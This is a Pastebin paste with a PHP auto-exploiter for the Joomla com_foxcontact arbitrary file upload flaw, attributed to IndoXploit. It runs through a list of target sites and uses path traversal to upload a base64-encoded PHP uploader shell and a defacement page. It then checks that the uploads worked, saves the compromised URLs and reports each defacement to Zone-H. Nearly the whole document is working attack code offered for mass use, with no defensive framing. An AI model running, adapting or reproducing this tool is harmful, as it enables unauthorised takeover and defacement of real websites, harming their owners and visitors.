SHARE
TWEET

Fox woy

a guest Aug 24th, 2019 119 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /**
  3.  
  4. Joomla Component com_foxcontact Arbitrary File Upload
  5. https://cxsecurity.com/issue/WLB-2016050072
  6.  
  7. Auto Exploiter (Shell Upload, Auto Deface, and Auto Submit Zone -H)
  8. Coded by: L0c4lh34rtz - IndoXploit
  9. http://www.indoxploit.or.id/2017/12/joomla-component-comfoxcontact.html
  10.  
  11. */
  12.  
  13. error_reporting(0);
  14. set_time_limit(0);
  15.  
  16. Class IDX_Foxcontact {
  17.     public  $url;
  18.     private $file = [];
  19.  
  20.     /* Nick Hacker Kalian / Nick Zone -H Kalian */
  21.     /* Pastikan dalam script deface kalian terdapat kata HACKED */
  22.     private $hacker = "Tn.Infinity";
  23.  
  24.     /* script uploader, sebaiknya jangan di otak-atik */
  25.     private $uploader  = 'PGh0bWwgbGFuZz0nZW4tVVMnPjxoZWFkPjx0aXRsZT5CeSBEZXJVcGxvYWQgRmluaXR5aW48L3RpdGxlPgo8YnI+Cjxib2R5Pgo8YnI+CjxzdHlsZT4KYm9keXtjdXJzb3I6dXJsKCJodHRwOi8vL2Zvcm8uZWxoYWNrZXIubmV0L2VsaGFja2VyLmN1ciIpLGF1dG87fWh0bWx7ZGlzcGxheTp0YWJsZTtoZWlnaHQ6MTAwJTt3aWR0aDoxMDAlO31ib2R5e2Rpc3BsYXk6dGFibGUtcm93O31ib2R5e2Rpc3BsYXk6dGFibGUtY2VsbDt2ZXJ0aWNhbC1hbGlnbjptaWRkbGU7dGV4dC1hbGlnbjpjZW50ZXI7fWE6bGlua3t0ZXh0LWRlY29yYXRpb246bm9uZTt9CmJvZHkgewoJICBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOwoJYmFja2dyb3VuZC1pbWFnZTogdXJsKGh0dHBzOi8vaS5pYmIuY28vVzNGWlNwQy9PRkZJQ0lBTC1GUkkzLU5EUy1DWUJFUi1BUk1ZLTIwMTkwNjI1LTA4MjI1MC5naWYpOwo8IS0taHR0cDovL3d3dy50d2l0cmNvdmVyLmNvbS9hci91cGxvYWRzL0FsLVF1ZHMtVHdpdHRlci1IZWFkZXItODUzNC5qcGctLT4KCW1hcmdpbi1sZWZ0OiAwcHg7CgltYXJnaW4tdG9wOiAwcHg7CgltYXJnaW4tcmlnaHQ6IDBweDsKCW1hcmdpbi1ib3R0b206IDBweDsKCWJhY2tncm91bmQtcG9zaXRpb246cmlnaHQgdG9wOwoJYmFja2dyb3VuZC1yZXBlYXQ6bm8tcmVwZWF0OwoJYmFja2dyb3VuZC1zaXplOjE1MCUKfQoKCi5zdHlsZTEgewoJZm9udC1mYW1pbHk6IEFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2VyaWY7Cglmb250LXNpemU6IDEycHg7Cn0KPC9zdHlsZT48YnI+PGJyPjxicj4KCjxicj4KPGNlbnRlcj48P3BocAplY2hvICI8Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPgoJICA8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4X2ZpbGUnPgoJICA8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPgoJICA8L2Zvcm0+IjsKJHJvb3QgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOwokZmlsZXMgPSAkX0ZJTEVTWydpZHhfZmlsZSddWyduYW1lJ107CiRkZXN0ID0gJHJvb3QuJy8nLiRmaWxlczsKaWYoaXNzZXQoJF9QT1NUWyd1cGxvYWQnXSkpIHsKCWlmKGlzX3dyaXRhYmxlKCRyb290KSkgewoJCWlmKEBjb3B5KCRfRklMRVNbJ2lkeF9maWxlJ11bJ3RtcF9uYW1lJ10sICRkZXN0KSkgewoJCQkkd2ViID0gImh0dHA6Ly8iLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4iLyI7CgkJCWVjaG8gIlN1a3NlcyBVcGxvYWRueWEgSW5maW5pdHk6KiAtPiA8YSBocmVmPSckd2ViLyRmaWxlcycgdGFyZ2V0PSdfYmxhbmsnPjxiPjx1PiR3ZWIvJGZpbGVzPC91PjwvYj48L2E+IjsKCQl9IGVsc2UgewoJCQllY2hvICJnYWdhbCB1cGxvYWQgcm9vdCA+OigiOwoJCX0KCX0gZWxzZSB7CgkJaWYoQGNvcHkoJF9GSUxFU1snaWR4X2ZpbGUnXVsndG1wX25hbWUnXSwgJGZpbGVzKSkgewoJCQllY2hvICJTdWtzZXMgVXBsb2FkbnlhIEluZmluaXR5OiogPGI+JGZpbGVzPC9iPiBkaSBmb2xkZXIgaW5pIjsKCQl9IGVsc2UgewoJCQllY2hvICJnYWdhbCB1cGxvYWQgPjooIjsKCQl9Cgl9Cn0KPz4KCjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KPHRpdGxlPkIuQS5DLk8uVDwvdGl0bGU+Cgk8aGVhZD4KCTxsaW5rIGhyZWY9J2h0dHBzOi8vZm9udHMuZ29vZ2xlYXBpcy5jb20vY3NzP2ZhbWlseT1BcmNoaXRlY3RzK0RhdWdodGVyJyByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJz4KCTwvaGVhZD4KPGJvZHkgYmdjb2xvcj0iIzJiMmIyYiIgbGluaz0iZ3JheSIgdGV4dD0iZ3JheSI+CjxjZW50ZXI+Cgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CiAgICByZXR1cm47CiAgfQogIHRoaXMuZWxlbWVudCA9IGVsZW1lbnQ7CiAgdGhpcy5maW5pc2hlZENhbGxiYWNrID0gKGZpbmlzaGVkQ2FsbGJhY2sgPyBmaW5pc2hlZENhbGxiYWNrIDogZnVuY3Rpb24oKSB7IHJldHVybjsgfSk7CiAgdGhpcy5pbnRlcnZhbCA9ICh0eXBlb2YgaW50ZXJ2YWwgPT0gInVuZGVmaW5lZCIgPyAxMDAgOiBpbnRlcnZhbCk7CiAgdGhpcy5vcmlnVGV4dCA9IHRoaXMuZWxlbWVudC5pbm5lckhUTUw7CiAgdGhpcy51bnBhcnNlZE9yaWdUZXh0ID0gdGhpcy5vcmlnVGV4dDsKICB0aGlzLmN1cnNvciA9IChjdXJzb3IgPyBjdXJzb3IgOiAiIik7CiAgdGhpcy5jdXJyZW50VGV4dCA9ICIiOwogIHRoaXMuY3VycmVudENoYXIgPSAwOwogIHRoaXMuZWxlbWVudC50eXBpbmdUZXh0ID0gdGhpczsKICBpZih0aGlzLmVsZW1lbnQuaWQgPT0gIiIpIHRoaXMuZWxlbWVudC5pZCA9ICJ0eXBpbmd0ZXh0IiArIFR5cGluZ1RleHQuY3VycmVudEluZGV4Kys7CiAgVHlwaW5nVGV4dC5hbGwucHVzaCh0aGlzKTsKICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsKICB0aGlzLmluVGFnID0gZmFsc2U7CiAgdGhpcy50YWdCdWZmZXIgPSAiIjsKICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciA9ICIiOwp9ClR5cGluZ1RleHQuYWxsID0gbmV3IEFycmF5KCk7ClR5cGluZ1RleHQuY3VycmVudEluZGV4ID0gMDsKVHlwaW5nVGV4dC5ydW5BbGwgPSBmdW5jdGlvbigpIHsKICBmb3IodmFyIGkgPSAwOyBpIDwgVHlwaW5nVGV4dC5hbGwubGVuZ3RoOyBpKyspIFR5cGluZ1RleHQuYWxsW2ldLnJ1bigpOwp9ClR5cGluZ1RleHQucHJvdG90eXBlLnJ1biA9IGZ1bmN0aW9uKCkgewogaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiBpZih0eXBlb2YgdGhpcy5vcmlnVGV4dCA9PSAidW5kZWZpbmVkIikgewogICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7CiAgIHJldHVybjsKIH0KIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiPCIgJiYgIXRoaXMuaW5UYWcpIHsKICAgICB0aGlzLnRhZ0J1ZmZlciA9ICI8IjsKICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgdGhpcy5ydW4oKTsKICAgICByZXR1cm47CiAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiPiIgJiYgdGhpcy5pblRhZykgewogICAgIHRoaXMudGFnQnVmZmVyICs9ICI+IjsKICAgICAgdGhpcy5pblRhZyA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMudGFnQnVmZmVyOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSBpZih0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiJiIgJiYgIXRoaXMuaW5IVE1MRW50aXR5KSB7CiAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciArPSAiOyI7CiAgICAgIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5IVE1MRW50aXR5QnVmZmVyOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSBpZih0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIHsKICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsKICAgIH0KICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSB0aGlzLmN1cnJlbnRUZXh0OwogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCArPSAodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoIC0gMSA/ICh0eXBlb2YgdGhpcy5jdXJzb3IgPT0gImZ1bmN0aW9uIiA/IHRoaXMuY3Vyc29yKHRoaXMuY3VycmVudFRleHQpIDogdGhpcy5jdXJzb3IpIDogIiIpOwogICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKIH0gZWxzZSB7CiAgICAgICAgdGhpcy5jdXJyZW50VGV4dCA9ICIiOwogICAgICAgIHRoaXMuY3VycmVudENoYXIgPSAwOwogICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2soKTsKIH0KfQo8L3NjcmlwdD4KPGJyPjxicj48YnI+CjxkaXYgaWQ9InNhdHUiPgo8YnI+CjxiIHN0eWxlPSJmb250LXNpemU6IDcwcHg7Ij5VcGxvYWRlciBUbi5JbmZpbml0eTwvYj4KPGJyPjxicj4KPGZvbnQgc2l6ZT0nMjBweCcgY29sb3I9J3JlZCcgZmFjZT0nQ291cmllciBOZXcnPiBGUkkzTkRTIENZQkVSIEFSTVkgPC9mb250PiA8YnI+PGJyPgpDb250YWN0IDogbGVnZW5kZzgzQGdtYWlsLmNvbQoKICAgIDxicj48YnI+Cjxmb250IHNpemU9JzIwcHgnIGNvbG9yPSdyZWQnIGZhY2U9J0NvdXJpZXIgTmV3Jz7CqSAyMDE5IC0gVG4uSW5maW5pdHkgPC9mb250Pgo=';
  26.        
  27.     /* script deface, ubah bagian ini ke base64 script deface kalian */
  28.     private $deface    = 'PGh0bWw+CjxoZWFkPjx0aXRsZT5QYXduZWQ/QnkgVG4uSW5maW5pdHk8L3RpdGxlPgo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiY29udGVudD0iaHR0cHM6Ly9hdmF0YXJzMy5naXRodWJ1c2VyY29udGVudC5jb20vdS80NTU3NTkyMT9zPTQ2MCZ2PTQiPgo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iRlJJM05EUyBDWUJFUiBBUk1ZIj4gPG1ldGEgbmFtZT0ia2V5d29yZHMiIGNvbnRlbnQ9IlV3YXUiPiAKPG1ldGEgaHR0cC1lcXVpdj0iY2FjaGUtY29udHJvbCIgY29udGVudD0iaW5kZXgsY2FjaGUiPiAKPG1ldGEgaHR0cC1lcXVpdj0icHJhZ21hIiBjb250ZW50PSJpbmRleCxjYWNoZSI+CjxzY3JpcHQ+CmFsZXJ0KCJGUkkzTkRTIENZQkVSIEFSTVkiKTsKYWxlcnQoIlRuLkluZmluaXR5Iik7Cjwvc2NyaXB0Pgo8bGluayBocmVmPSdodHRwOi8vZm9udHMuZ29vZ2xlYXBpcy5jb20vY3NzP2ZhbWlseT1PcmJpdHJvbjo3MDAnIHJlbD0nc3R5bGVzaGVldCcgdHlwZT0ndGV4dC9jc3MnPgo8bGluayBocmVmPSJodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9Q2hld3kiIHJlbD0ic3R5bGVzaGVldCI+IAo8bGluayBocmVmPSJodHRwczovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9Q2hld3l8WkNPT0wgS3VhaUxlIiByZWw9InN0eWxlc2hlZXQiPgo8Ym9keSBiZ2NvbG9yPSJibGFjayI+CiA8Ym9keSBiYWNrZ3JvdW5kPSJodHRwczovL2kwLndwLmNvbS9yZXRyb2JveHBob3RvYm9vdGguY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy9oaXRhbS5qcGciPgo8Y2VudGVyPjxpbWcgc3JjPSJodHRwczovL2QudG9wNHRvcC5uZXQvcF8xMDA1ZWFlOTUxLmpwZyIgd2lkZ2V0PTI1JSBoZWlnaHQ9MjUlPgo8YnI+Cjxicj4KPGJyPjxmb250IGZhY2U9Ik9yYml0cm9uIiBzaXplPSI3IiBjb2xvcj0id2hpdGUiPls8Zm9udCBmYWNlPSJPcmJpdHJvbiIgc2l6ZT0iNyIgY29sb3I9InllbGxvdyI+ITxmb250IGZhY2U9Ik9yYml0cm9uIiBzaXplPSI3IiBjb2xvcj0id2hpdGUiPl0gPGZvbnQgZmFjZT0iT3JiaXRyb24iIHNpemU9IjciIGNvbG9yPSJncmVlbiI+UGF3bmVkIEJ5PGZvbnQgY29sb3I9IlJlZCI+IFRuLkluZmluaXR5IDxmb250IGZhY2U9Ik9yYml0cm9uIiBzaXplPSI3IiBjb2xvcj0id2hpdGUiPls8Zm9udCBmYWNlPSJPcmJpdHJvbiIgc2l6ZT0iNyIgY29sb3I9InllbGxvdyI+ITxmb250IGZhY2U9Ik9yYml0cm9uIiBzaXplPSI3IiBjb2xvcj0id2hpdGUiPl0KPGJyPjxmb250IGZhY2U9IlpDT09MIEt1YWlMZSIgc2l6ZSI2IiBjb2xvcj0ieWVsbG93Ij5bPGZvbnQgZmFjZT0iWkNPT0wgS3VhaUxlIiBzaXplPSI2IiBjb2xvcj0iYmx1ZSI+RlJJM05EUyBDWUJFUiBBUk1ZPGZvbnQgZmFjZT0iWkNPT0wgS3VhaUxlIiBzaXplPSI2IiBjb2xvcj0ieWVsbG93Ij4gXTwvZm9udD48L2ZvbnQ+PC9mb250Pgo8YnI+Cjxicj48Zm9udCBmYWNlPSJaQ09PTCBLdWFpTGUiIHNpemU9IjYiIGNvbG9yPSJ3aGl0ZSI+QmVycGlraWxhaCBTZWJhZ2FpIFNlb3JhbmcgUGVtdWxhPGJyPk1ha2EgRHVuaWEgSW5pIEFrYW4gVGVyYnVrYTxicj5VbnR1ayBNdTwvZm9udD4KPGNlbnRlcj48YnI+PGJyPjxmb250IGZhY2U9IkNoZXd5IiBzaXplIjUiIGNvbG9yPSJibHVlIj5HcmV0eno8Zm9udCBmYWNlPSJDaGV3eSIgc2l6ZT0iNyIgY29sb3I9IndoaXRlIj4gOjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+CjxtYXJxdWVlIHNjcm9sbGFtb3VudD0iNyJ3aWR0aD0iNjAlIiBzdHlsZT0id2lkdGg6IDYwJTsiPgo8Zm9udCBmYWNlPSJDaGV3eSIgc2l6ZT0iNiIgY29sb3I9InllbGxvdyI+IE9mZmljaWFsIEZSMTNORDUgQ1lCRVIgQVJNWSB+MDV8Li9DUjBUIEQxTFU0UiAtIAp+MDV8TXIuS2VwbyAtIAp+MDV8WmFrX1NWQ0tTIC0gIH4wNXxNUlMuQU5OQSAtIAp+MDV8Q3I0elkgLQp+MDV8VG4uMFQwTkcgLQp+MDV8VG4uRzRMNEtTMSAtCn4wNXxQIC0KPGZvbnQgZmFjZT0iQ2hld3kiIHNpemU9IjYiIGNvbG9yPSJyZWQiPiB+MDV8VG4uSW5maW5pdHkgLQo8Zm9udCBmYWNlPSJDaGV3eSIgc2l6ZT0iNiIgY29sb3I9InllbGxvdyI+IH4wNXxCVUNJTiAtIAp+MDV8c3VwcmlhdG5hIC0KfjA1fE1ycy5KcnNHYWxheHkgLQp+MDV8TXIuUnkgLQp+MDV8Li9EZWt1X0t1biAtIApNeSBGcmllbmRzIC0gVG4uU291cmNoSUQgLSBUbi5PeC1GT1JaIC0gVG4uUml6ejIyIC0gTXIuM0wzUEg0TlQgLSAgTXIuSkoKPGJyPjwvZm9udD4gPC9mb250PjwvbWFycXVlZT48YnI+PGJyPjxhIGhyZWY9Im1haWx0bzpjbGF5MmsyMEBnbWFpbC5jb20iPjxmb250IGNvbG9yPSJibHVlIiBmYWNlPSJPcmJpdHJvbiIgc2l6ZT0iNCI+Q29udGFjdCBNZT88L2E+PGJyPjwvZm9udD48L2NlbnRlcj4KPGlmcmFtZSB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBzcmM9Imh0dHBzOi8vYXBpLnNvdW5kY2xvdWQuY29tL3RyYWNrcy81MzkwMTg4NzEvc3RyZWFtP2NsaWVudF9pZD1hM2UwNTk1NjNkN2ZkMzM3MmI0OWIzN2YwMGEwMGJjZiIgZnJhbWVib3JkZXI9IjAiIGFsbG93ZnVsbHNjcmVlbj4KPC9jZW50ZXI+';
  29.  
  30.          
  31.  
  32.     public function __construct() {
  33.         $this->file = (object) $this->file;
  34.  
  35.         /* Nama file deface kalian */
  36.         $this->file->deface     = "fca2.htm";
  37.  
  38.         $this->file->shell      = "fload.php";
  39.     }
  40.  
  41.     public function validUrl() {
  42.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
  43.             $url = "http://".$this->url;
  44.             return $url;
  45.         } else {
  46.             return $this->url;
  47.         }
  48.     }
  49.  
  50.     public function randomFileName() {
  51.         $characters = implode("", range(0,9)).implode("", range("A","Z")).implode("", range("a","z"));
  52.         $generate   = substr(str_shuffle($characters), 0, rand(4, 8));
  53.  
  54.         $prefixFilename = "\x69\x6e\x64\x6f\x78\x70\x6c\x6f\x69\x74"."_";
  55.         return $prefixFilename.$generate;
  56.     }
  57.  
  58.     public function curl($url, $data = null, $headers = null, $cookie = true) {
  59.         $ch = curl_init();
  60.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  61.               curl_setopt($ch, CURLOPT_URL, $url);
  62.               curl_setopt($ch, CURLOPT_USERAGENT, "IndoXploitTools/1.1");
  63.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
  64.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  65.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  66.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  67.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  68.  
  69.         if($data !== null) {
  70.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
  71.               curl_setopt($ch, CURLOPT_POST, TRUE);
  72.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  73.         }
  74.  
  75.         if($headers !== null) {
  76.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  77.         }
  78.  
  79.         if($cookie === true) {
  80.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
  81.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  82.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  83.         }
  84.  
  85.         $exec = curl_exec($ch);
  86.         $info = curl_getinfo($ch);
  87.  
  88.               curl_close($ch);
  89.  
  90.         return (object) [
  91.             "response"  => $exec,
  92.             "info"      => $info
  93.         ];
  94.  
  95.     }
  96.  
  97.     public function getId() {
  98.         $url        = $this->url;
  99.         $getContent = $this->curl($url)->response;
  100.         preg_match_all("/<a name=\"cid_(.*?)\">/", $getContent, $cid);
  101.         preg_match_all("/<a name=\"mid_(.*?)\">/", $getContent, $mid);
  102.  
  103.         return (object) [
  104.             "cid" => ($cid[1][0] === NULL ? 0 : $cid[1][0]),
  105.             "mid" => ($mid[1][0] === NULL ? 0 : $mid[1][0]),
  106.         ];
  107.     }
  108.  
  109.     public function exploit() {
  110.         $getCid = $this->getId()->cid;
  111.         $getMid = $this->getId()->mid;
  112.  
  113.         $url    = (object) parse_url($this->url);
  114.  
  115.         $headers = [
  116.             "X-Requested-With: XMLHttpRequest",
  117.             "X-File-Name: ".$this->file->shell,
  118.             "Content-Type: image/jpeg"
  119.         ];
  120.  
  121.         $vuln   = [
  122.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  123.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  124.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  125.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../".$this->file->shell,
  126.         ];
  127.  
  128.         foreach($vuln as $v) {
  129.             $this->curl($v, base64_decode($this->uploader), $headers);
  130.         }
  131.  
  132.         $shell = $url->scheme."://".$url->host."/components/com_foxcontact/".$this->file->shell;
  133.         $check = $this->curl($shell)->response;
  134.         if(preg_match("/Uploader By IndoXploit BOT/i", $check)) {
  135.             print "[+] Shell OK: ".$shell."\n";
  136.             $this->save($shell);
  137.         } else {
  138.             print "[-] Shell Failed\n";
  139.         }
  140.        
  141.         $vuln   = [
  142.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/file-uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  143.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  144.             $url->scheme."://".$url->host."/index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id=".$getCid."?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  145.             $url->scheme."://".$url->host."/components/com_foxcontact/lib/uploader.php?cid=".$getCid."&mid=".$getMid."&qqfile=/../../../../".$this->file->deface,
  146.         ];
  147.  
  148.         foreach($vuln as $v) {
  149.             $this->curl($v, base64_decode($this->deface), $headers);
  150.         }
  151.  
  152.         $deface = $url->scheme."://".$url->host."/".$this->file->deface;
  153.         $check = $this->curl($deface)->response;
  154.         if(preg_match("/hacked/i", $check)) {
  155.             print "[+] Deface OK: ".$deface."\n";
  156.             $this->zoneh($deface);
  157.             $this->save($deface);
  158.         } else {
  159.             print "[-] Deface Failed\n";
  160.         }
  161.     }
  162.  
  163.     public function zoneh($url) {
  164.         $post = $this->curl("http://www.zone-h.com/notify/single", "defacer=".$this->hacker."&domain1=$url&hackmode=1&reason=1&submit=Send",null,false);
  165.         if(preg_match("/color=\"red\">(.*?)<\/font><\/li>/i", $post->response, $matches)) {
  166.             if($matches[1] === "ERROR") {
  167.                 preg_match("/<font color=\"red\">ERROR:<br\/>(.*?)<br\/>/i", $post->response, $matches2);
  168.                 print "[-] Zone-H ($url) [ERROR: ".$matches2[1]."]\n\n";
  169.             } else {
  170.                 print "[+] Zone-H ($url) [OK]\n\n";
  171.             }
  172.         }
  173.     }
  174.  
  175.     public function save($isi) {
  176.         $handle = fopen("result_foxcontact.txt", "a+");
  177.         fwrite($handle, "$isi\n");
  178.         fclose($handle);
  179.     }
  180. }  
  181.  
  182. if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
  183. if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
  184. $open = explode("\n", file_get_contents($argv[1]));
  185.  
  186. foreach($open as $list) {
  187.     $fox = new IDX_Foxcontact();
  188.     $fox->url = trim($list);
  189.     $fox->url = $fox->validUrl();
  190.  
  191.     print "[*] Exploiting ".parse_url($fox->url, PHP_URL_HOST)."\n";
  192.     $fox->exploit();
  193. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top